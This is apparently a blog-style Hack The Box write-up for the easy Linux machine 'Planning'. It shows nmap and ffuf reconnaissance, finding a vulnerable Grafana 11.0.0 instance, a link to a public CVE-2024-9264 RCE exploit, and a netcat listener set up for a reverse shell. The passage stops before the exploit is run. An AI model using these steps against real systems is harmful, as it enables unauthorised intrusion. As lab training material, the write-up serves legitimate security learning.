penetration-testing

Hack The Box - Planning - May 10th

1337 Sheets
1337 Sheets
·
Hack The Box - Planning - May 10th

Difficulty: Easy
OS: Linux
Points: 20
Date: 2025-05-10

๐Ÿ“ Initial Access Info

We begin this assessment with credentials commonly provided in real-life pentests:

Username: admin  
Password: 0D5oT70Fq13EvB5r

๐Ÿ” Reconnaissance

๐Ÿ”Ž Nmap Scan

nmap -sV -sC -oN scan BOX-IP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Edukate - Online Education Website
|_http-server-header: nginx/1.24.0 (Ubuntu)

๐ŸŒ Web Enumeration

๐Ÿ“Œ Main Site - http://planning.htb

  • Title: Edukate - Online Education Website

  • Web Server: nginx/1.24.0

๐Ÿ”Ž Subdomain Discovery

Using ffuf with the top subdomain wordlist: bash CopyEdit

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" -u http://BOX-IP -ac -v

โœ… Found Subdomain: `grafana.planning.htb

โš™๏ธ Grafana Exploitation

Upon visiting http://grafana.planning.htb, we identified:

  • Version: Grafana 11.0.0

  • Login using provided credentials failed

  • This version is vulnerable to CVE-2024-9264 (Auth RCE)

https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit?tab=readme-ov-file

๐Ÿงจ Exploiting CVE-2024-9264

Started listener:

nc -lvnp 9001

Executed exploit: